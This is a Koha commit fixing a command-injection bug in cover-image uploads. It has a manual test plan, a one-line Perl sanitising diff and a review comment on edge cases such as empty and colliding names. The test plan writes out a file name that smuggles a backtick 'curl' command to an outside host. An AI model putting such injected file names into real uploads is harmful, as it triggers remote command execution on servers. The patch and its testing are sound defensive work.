Bug: 36818 Escape characters in file names uploaded
To test:
1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip' Where the domain is one you can watch the logs from
2/ Upload this file as a cover image
3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames
4/ Choose process, check the logs of the webserver see the connection has been made
5/ Apply the patch
5/ Repeat 2 & 3 and see the filename is now escaped
6/ Choose process and check no errors but no remote execution occurs
7/ Test uploading actual zip file and images still works

Signed-off-by: Amit Gupta <amit.gupta@informaticsglobal.com>
Signed-off-by: Martin Renvoize <martin.renvoize@ptfs-europe.com>
Signed-off-by: Katrin Fischer <katrin.fischer@bsz-bw.de>
parent 97aa7492ef
commit da7186ea3d
1 changed files with 1 additions and 0 deletions
@ -264,6 +264,7 @@ sub _dir {
sub _hook {
my ( $self, $filename, $buffer, $bytes_read, $data ) = @_;
$filename= Encode::decode_utf8( $filename ); # UTF8 chars in filename
$filename =~ s/[^A-Za-z0-9\-\.]//g;
$self->_compute( $filename, $buffer );
my $fh = $self->_fh( $filename ) // $self->_create_file( $filename );
print $fh $buffer if $fh;
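Review bot: The new substitution `$filename =~ s/[^A-Za-z0-9\-\.]//g;` in `_hook` deletes characters rather than escaping them and runs right after `Encode::decode_utf8`, so a name written entirely in non-ASCII characters is reduced to its extension or to an empty string, and two different uploads such as `a b.zip` and `ab.zip` end up with the same name; nothing checks the result before it is passed to `_compute` and `_create_file`. Suggest rejecting the upload or substituting a generated name when the sanitised value is empty or consists only of dots, and adding a comment on the new line saying that it is an allow-list for names that are used again at the processing step, since the existing "UTF8 chars in filename" comment above it no longer describes what survives. The character class also keeps a leading `-` and the sequence `..`; prepending a fixed prefix to the stored name would rule both out. The test plan in the commit message is manual only, so a unit test that feeds `_hook` a name containing backticks, spaces and non-ASCII characters would keep this from regressing.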